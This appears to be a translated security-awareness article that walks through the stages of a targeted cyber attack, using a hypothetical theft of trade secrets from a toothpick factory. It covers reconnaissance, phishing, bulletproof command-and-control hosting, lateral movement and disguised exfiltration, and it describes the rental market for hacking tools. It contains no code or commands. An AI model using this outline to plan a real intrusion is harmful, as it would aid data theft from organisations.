What modern targeted attacks look like

Targeted cyber attacks differ from mass hacker attacks in that they are aimed at a specific company or organization. Such attacks are most effective because they are planned and personalized using information gathered about the victim. It all starts with the collection of information. As a rule, this is the longest and most laborious part of the operation. And then you need to prepare and conduct an attack. From the outside, everything looks quite complicated and it seems that only elite crackers can do this. However, reality looks different.

If in 2017 the share of non-targeted attacks was 90% , and the target was only 9.9%, in 2018 and 2019 there was a steady increase in precisely targeted attacks . If they are so difficult to perform, why are there more of them? And how are modern targeted attacks carried out, why do hackers switch from mass attacks to targeted ones? Why is the number of such incidents related to well-known cyber groups not so large as it might seem? Let's get it right.

Imagine a group of hackers who decided to attack the factory that produces curly toothpicks in order to steal the secret of their production and sell it to competitors. Consider what stages such an attack can consist of and what tools will be needed for this.
')

Stage 1. Information gathering

Hackers need to collect as much information as possible about the plant, its management and employees, network infrastructure, as well as about suppliers and customers. To do this, attackers examine the site of the plant and all IP addresses belonging to the enterprise using a vulnerability scanner. According to public sources, a list of employees is compiled, their profiles on social networks and the sites they constantly visit are studied. Based on the information gathered, an attack plan is prepared and all the necessary utilities and services are selected.

Tools: vulnerability scanner, website logging services, stolen email and website credentials.

Stage 2. Organization of entry points

Using the information collected, hackers are preparing to penetrate the company’s network. The easiest way is phishing emails with malicious attachments or links.

Criminals do not need to have the skills of social engineering or the development of web exploits for different versions of the browser - everything you need is available in the form of services on hacker forums and on the darknet. For a relatively small fee, these specialists will prepare phishing emails based on the data collected. Malicious content for websites can also be purchased as a malicious-code-installation-as-a-service service. In this case, the customer does not need to delve into the implementation details. The script will automatically detect the browser and the victim’s platform and exploit it. It will use the appropriate version of the exploit to introduce penetration to the device.

Tools: “malicious code as a service” service , a service for developing malicious phishing emails.

Step 3. Connecting to the management server

After penetrating the plant’s network, hackers need a bridgehead to secure and carry out further actions. It can be a compromised computer with a backdoor installed, accepting commands from the managing server on a dedicated “bulletproof” hosting (or “complaint-resistant”, it is also “bulletproof” or BPHS - bulletproof hosting service). Another way involves organizing a management server directly inside the enterprise infrastructure, in our case, the plant. At the same time, you don’t have to hide the traffic between the malware installed on the network and the server.


SOURCE: TREND MICRO

Cybercrime markets offer various options for such servers, made in the form of full-fledged software products, for which technical support is even provided.

Tools: "fault-tolerant" (bulletproof) hosting, C & C server-as-a-service.

Stage 4. Lateral displacements

It is far from a fact that access to the first compromised computer in the plant’s infrastructure will make it possible to obtain information on the production of curly toothpicks. To get to them, you need to find out where the main secret is stored and how to get to it.

This stage is called "lateral movement" (lateral movement). As a rule, scripts are used to conduct it, automating network scanning, obtaining administrative privileges, removing dumps from databases, and searching for documents stored on the network. Scripts can use operating system utilities or download original designs available at an additional cost.

Tools: scripts to scan the network, obtain administrative privileges, drain data and search for documents.

Stage 5. Attack Support

The times when hackers had to sit burying themselves in the terminal to accompany the attack and constantly banging keys while typing various commands were a thing of the past. Modern cybercriminals use convenient web interfaces, panels and dashboards to coordinate their work. The stages of the attack are displayed in the form of visual graphs, the operator receives notifications of problems that arise, and various solutions may be offered to solve them.

Tools: web attack control panel

Stage 6. Theft of information

Once the necessary information is found, you need to transfer it as quickly as possible and quietly from the factory network to hackers. The transmission must be disguised as legitimate traffic so that the DLP system does not notice anything. For this, hackers can use secure connections, encryption, packaging and steganography.

Tools: cryptors, encryptors, VPN tunnels, DNS tunnels.

Attack result

Our hypothetical hackers easily penetrated the factory network, found the information necessary for the customer and stole it. All they needed for this was a relatively small amount for the rental of hacker tools, which they more than compensated by selling the secret of toothpicks to competitors.

findings

Everything you need to conduct targeted attacks is easily available on the darknet and on hacker forums. Anyone can buy or rent a tool kit, and the level of supply is so high that sellers offer technical support and constantly reduce prices. In this situation, there is no point in wasting time shooting hummingbirds out of the cannon and doing large-scale malicious campaigns. Significantly greater returns will bring several targeted attacks.

Elite hacker groups also keep up with trends and diversify risks. They understand that conducting attacks is a dangerous, albeit lucrative, thing. During the preparation of attacks and in the pauses between them, I also want to eat, which means that additional income will not hurt. So why not let others use their designs for a decent reward? This gave rise to a massive offer of hacking services for rent and, according to the laws of the market, led to a decrease in their cost.


SOURCE: TREND MICRO

As a result, the threshold for entering the targeted attacks segment has decreased, and analytic companies have been increasing year after year.

Another consequence of the availability of tools on cybercrime marketplaces is that now the attacks of APT groups are much more difficult to distinguish from the attacks carried out by criminals who rent their tools. Thus, protection against APT and unorganized cybercriminals requires almost the same measures, although more resources are needed to counter APT.

As an empirical criterion by which the actions of APT hackers are identified, there are only the complexity and originality of the attacks, the use of unique developments and exploits that are not available on underground marketplaces, and a higher level of knowledge of the tools.